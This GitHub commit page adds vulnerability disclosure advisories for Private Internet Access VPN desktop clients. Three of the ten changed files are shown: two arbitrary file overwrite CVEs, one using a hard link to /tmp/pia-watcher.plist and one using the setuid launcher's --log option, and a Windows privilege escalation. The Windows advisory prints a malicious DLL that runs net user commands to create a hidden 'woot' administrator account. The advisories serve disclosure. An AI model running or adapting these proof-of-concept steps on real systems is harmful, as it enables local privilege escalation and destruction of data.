-
Notifications
You must be signed in to change notification settings - Fork 30
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Add advisories for Private Internet Access VPN desktop vulnerabilities
- Loading branch information
Showing
10 changed files
with
996 additions
and
3 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,111 @@ | ||
Title: PIA Beta macOS Arbitrary File Overwrite | ||
|
||
Author: Rich Mirch | ||
|
||
CVE: CVE-2019-12571 | ||
|
||
Vendor Advisory: N/A | ||
|
||
Description | ||
|
||
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client | ||
v0.9.8 beta (build 02099) for macOS could allow an authenticated, local attacker to | ||
overwrite arbitrary files. | ||
|
||
When the client initiates a connection, the XML /tmp/pia-watcher.plist file is created. | ||
If the file exists, it will be truncated and the contents completely overwritten. | ||
This file is removed on disconnect. An unprivileged user can create a hard or soft | ||
link to arbitrary files owned by any user on the system, including root. This creates | ||
a denial of service condition and possible data loss if leveraged by a malicious local user. | ||
|
||
|
||
CVSS | ||
|
||
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H/E:H/RL:U/RC:C | ||
Base: 7.1 | ||
Temporal: 7.1 | ||
|
||
|
||
Test Environment | ||
|
||
OS: macOS Mojave 10.14.1 | ||
Kernel: Darwin Kernel Version 18.2.0 | ||
PIA Version: v0.9.8 beta (build 02099) | ||
|
||
Steps to reproduce | ||
|
||
All steps are executed as a low privileged user. | ||
|
||
macbook:~ test2$ id | ||
uid=508(test2) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),704(com.apple.sharepoint.group.4),100(_lpoperator),701(com.apple.sharepoint.group.1),333(piavpn),703(com.apple.sharepoint.group.3),702(com.apple.sharepoint.group.2) | ||
|
||
|
||
Step 1 - Create a root owned test file with permissions 600. | ||
|
||
|
||
bash-3.2# echo "this is a test" > /etc/test.file | ||
bash-3.2# chmod 600 /etc/test.file | ||
bash-3.2# ls -ld /etc/test.file | ||
-rw------- 1 root wheel 15 Dec 27 10:14 /etc/test.file | ||
|
||
|
||
Step 2 - Show that test2 does not have permission to write to /etc/test.file. | ||
|
||
|
||
macbook:~ test2$ echo test > /etc/test.file | ||
-bash: /etc/test.file: Permission denied | ||
|
||
|
||
Step 3 - Create a hard or soft link to a root owned file. | ||
|
||
|
||
macbook:~ test2$ ln /etc/test.file /tmp/pia-watcher.plist | ||
macbook:~ test2$ ls -li /etc/test.file /tmp/pia-watcher.plist | ||
12888119231 -rw------- 2 root wheel 15 Dec 27 10:14 /etc/test.file | ||
12888119231 -rw------- 2 root wheel 15 Dec 27 10:14 /tmp/pia-watcher.plist | ||
|
||
|
||
Step 4 - Open the PIA client and connect. The file will be overwritten with the XML plist. | ||
|
||
|
||
macbook:~ test2$ ls -li /etc/test.file /tmp/pia-watcher.plist | ||
ls: /tmp/pia-watcher.plist: No such file or directory | ||
12888119231 -rw------- 1 root wheel 801 Dec 27 10:17 /etc/test.file | ||
|
||
|
||
Step 5 - As root display the contents of /etc/secret.file | ||
|
||
|
||
bash-3.2# cat /etc/test.file | ||
<?xml version="1.0" encoding="UTF-8"?> | ||
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> | ||
<plist version="1.0"> | ||
<dict> | ||
<key>Label</key> | ||
<string>com.privateinternetaccess.vpn.watcher</string> | ||
<key>ProgramArguments</key> | ||
<array> | ||
<string>/Applications/Private Internet Access.app/Contents/MacOS/pia-openvpn-helper</string> | ||
</array> | ||
<key>EnvironmentVariables</key> | ||
<dict> | ||
<key>script_type</key> | ||
<string>watch-notify</string> | ||
</dict> | ||
<key>StandardErrorPath</key> | ||
<string>/Library/Application Support/com.privateinternetaccess.vpn/watcher.log</string> | ||
<key>WatchPaths</key> | ||
<array> | ||
<string>/Library/Preferences/SystemConfiguration</string> | ||
</array> | ||
</dict> | ||
</plist> | ||
|
||
|
||
Timeline: | ||
|
||
2018-12-27: Reported to vendor | ||
2018-12-27: Vendor acknowledged receipt of report | ||
2019-01-18: Vendor states fix will be available in v83 however this version was never released. | ||
The desktop client was re-written. Upgrade to v1.2.1+ of the new client. | ||
2019-06-10: Public disclosure |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,116 @@ | ||
Title: PIA Windows Privilege Escalation: Malicious OpenSSL engine | ||
|
||
Author: Rich Mirch | ||
|
||
CVE: CVE-2019-12572 | ||
|
||
Vendor Advisory: N/A | ||
|
||
Blog Post: https://blog.mirch.io/2019/06/10/cve-2019-12572-pia-windows-privilege-escalation-malicious-openssl-engine/ | ||
|
||
Description | ||
|
||
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN | ||
Client 1.0.2 (build 02363) for Windows could allow an authenticated, local | ||
attacker to run arbitrary code with elevated privileges. | ||
|
||
On startup the PIA Windows service(pia-service.exe) loads the OpenSSL library from | ||
C:\Program Files\Private Internet Access\libeay32.dll. This library attempts | ||
to load the c:\etc\ssl\openssl.cnf configuration file which does not exist. By | ||
default on Windows systems, authenticated users can create directories under c:\. | ||
A low privileged user can create an openssl.cnf configuration file to load a | ||
malicious OpenSSL engine library resulting in the arbitrary code execution as | ||
SYSTEM when the service starts. | ||
|
||
|
||
CVSS | ||
|
||
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:H/RL:U/RC:C | ||
Base: 7.8 | ||
Temporal: 7.8 | ||
|
||
|
||
Test Environment | ||
|
||
OS: Windows 10 Pro 10.0.17763 | ||
PIA Version: 1.0.2 (build 02363) | ||
|
||
|
||
Steps to reproduce | ||
|
||
Note: All steps are executed using a low privileged account. | ||
|
||
|
||
1) Create the c:\etc\ssl directory | ||
|
||
mkdir c:\etc\ssl | ||
|
||
|
||
2) Create a malicious engine library named woot.dll to create an administrator | ||
account named woot when loaded. | ||
|
||
|
||
/* Cross Compile with | ||
x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared | ||
*/ | ||
#include <windows.h> | ||
BOOL WINAPI DllMain( | ||
HINSTANCE hinstDLL, | ||
DWORD fdwReason, | ||
LPVOID lpReserved ) | ||
{ | ||
switch( fdwReason ) | ||
{ | ||
case DLL_PROCESS_ATTACH: | ||
system("cmd /c net user woot insertpasswordhere /add"); | ||
system("cmd /c net localgroup administrators woot /add"); | ||
break; | ||
case DLL_THREAD_ATTACH: | ||
// Do thread-specific initialization. | ||
break; | ||
case DLL_THREAD_DETACH: | ||
// Do thread-specific cleanup. | ||
break; | ||
case DLL_PROCESS_DETACH: | ||
// Perform any necessary cleanup. | ||
break; | ||
} | ||
return TRUE; // Successful DLL_PROCESS_ATTACH. | ||
} | ||
|
||
|
||
3) Copy the malicious woot.dll file into the c:\etc\ssl folder. | ||
|
||
copy woot.dll c:\etc\ssl | ||
|
||
|
||
4) Create the OpenSSL configuration file in c:\etc\ssl\openssl.cnf with the following contents. | ||
|
||
openssl_conf = openssl_init | ||
[openssl_init] | ||
engines = engine_section | ||
[engine_section] | ||
woot = woot_section | ||
[woot_section] | ||
engine_id = woot | ||
dynamic_path = c:\\etc\\ssl\\woot.dll | ||
init = 0 | ||
|
||
|
||
5) Reboot the system because a low privilege user does not have permission to | ||
restart the service. | ||
|
||
|
||
6) After the reboot has completed, login and open a command shell. At this point | ||
the "woot" administrator account will exist. | ||
|
||
|
||
net user woot | ||
|
||
|
||
Timeline: | ||
|
||
2019-02-16: Reported to vendor | ||
2019-02-16: Vendor confirmed vulnerability | ||
2019-06-04: Vendor released fix in v1.2.1 | ||
2019-06-10: Public disclosure |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,72 @@ | ||
Title: PIA Linux, macOS Arbitrary File Overwrite | ||
|
||
Author: Rich Mirch | ||
|
||
CVE: CVE-2019-12573 | ||
|
||
Vendor Advisory: N/A | ||
|
||
Description | ||
|
||
A vulnerability in the London Trust Media Private Internet Access (PIA) | ||
VPN Client v82 for Linux and macOS could allow an authenticated, local | ||
attacker to overwrite arbitrary files. | ||
|
||
The PIA Linux and macOS openvpn_launcher binary is setuid root. This | ||
binary supports the --log option which accepts a path as an argument. | ||
The --log parameter is not sanitized which allows a local unprivileged | ||
to overwrite arbitrary files owned by any user on the system, including | ||
root. This creates a denial of service condition and possible data loss | ||
if leveraged by a malicious local user. | ||
|
||
|
||
CVSS | ||
|
||
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H/E:H/RL:U/RC:C | ||
Base: 7.1 | ||
Temporal: 7.1 | ||
|
||
|
||
Test Environment | ||
|
||
OS: Ubuntu 18.04.1 LTS | ||
Kernel: 4.15.0-29-generic | ||
PIA Version: v82 | ||
|
||
OS: macOS Mojave 10.14.1 | ||
Kernel: Darwin Kernel Version 18.2.0 | ||
PIA Version: v82 | ||
|
||
|
||
Steps to reproduce | ||
|
||
|
||
Step 1 - Create a root owned test file. For this PoC /etc/test.txt is used. | ||
|
||
# As root | ||
echo "this is a test" > /etc/test.txt | ||
chmod 600 /etc/test.txt | ||
|
||
|
||
Step 2 - Overwrite the file using the --log option using a non privileged user. | ||
|
||
# macOS | ||
/Applications/Private\ Internet\ Access.app/Contents/Resources/openvpn_launcher --log /etc/test.txt | ||
|
||
# Linux | ||
/opt/pia/openvpn_launcher.64 --log /etc/test.txt | ||
|
||
|
||
Step 3 - Verify the file contents have been overwritten | ||
|
||
# As root | ||
cat /etc/test.txt | ||
|
||
|
||
Timeline: | ||
|
||
2018-12-23: Reported to vendor | ||
2018-12-23: Vendor acknowledged receipt of report | ||
2019-01-18: Vendor states fix will be available in v83 however this version was never released. | ||
The desktop client was re-written. Upgrade to v1.2.1+ of the new client. | ||
2019-06-10: Public disclosure |
Oops, something went wrong.